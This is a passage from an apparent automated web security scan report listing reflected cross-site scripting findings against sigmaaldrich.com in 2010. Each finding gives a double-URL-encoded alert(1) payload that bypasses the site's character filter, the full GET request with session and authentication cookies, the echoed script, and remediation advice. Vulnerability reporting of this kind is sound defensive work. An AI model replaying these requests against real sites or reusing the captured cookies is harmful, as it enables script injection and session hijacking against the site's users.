Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:49 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting911a4";alert(1)//439c0d0c37a","E404") ;
   </script>
...[SNIP]...

1.165. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb2c1%2522%253balert%25281%2529%252f%252fb1713c9019c was submitted in the REST URL parameter 1. This input was echoed as bb2c1";alert(1)//b1713c9019c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentbb2c1%2522%253balert%25281%2529%252f%252fb1713c9019c/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:33 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentbb2c1";alert(1)//b1713c9019c/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops","E404") ;
   </script>
...[SNIP]...

1.166. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fee1c%2522%253balert%25281%2529%252f%252f47869822d32 was submitted in the REST URL parameter 2. This input was echoed as fee1c";alert(1)//47869822d32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichfee1c%2522%253balert%25281%2529%252f%252f47869822d32/customer-support/customer-service/services/basic-research/technology-workshops HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichfee1c";alert(1)//47869822d32/customer-support/customer-service/services/basic-research/technology-workshops","E404") ;
   </script>
...[SNIP]...

1.167. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47283%2522%253balert%25281%2529%252f%252f3b290623f04 was submitted in the REST URL parameter 3. This input was echoed as 47283";alert(1)//3b290623f04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support47283%2522%253balert%25281%2529%252f%252f3b290623f04/customer-service/services/basic-research/technology-workshops HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support47283";alert(1)//3b290623f04/customer-service/services/basic-research/technology-workshops","E404") ;
   </script>
...[SNIP]...

1.168. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afbf3%2522%253balert%25281%2529%252f%252f4ab08bcd55f was submitted in the REST URL parameter 4. This input was echoed as afbf3";alert(1)//4ab08bcd55f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-serviceafbf3%2522%253balert%25281%2529%252f%252f4ab08bcd55f/services/basic-research/technology-workshops HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-serviceafbf3";alert(1)//4ab08bcd55f/services/basic-research/technology-workshops","E404") ;
   </script>
...[SNIP]...

1.169. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12230%2522%253balert%25281%2529%252f%252f49f621b980a was submitted in the REST URL parameter 5. This input was echoed as 12230";alert(1)//49f621b980a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services12230%2522%253balert%25281%2529%252f%252f49f621b980a/basic-research/technology-workshops HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
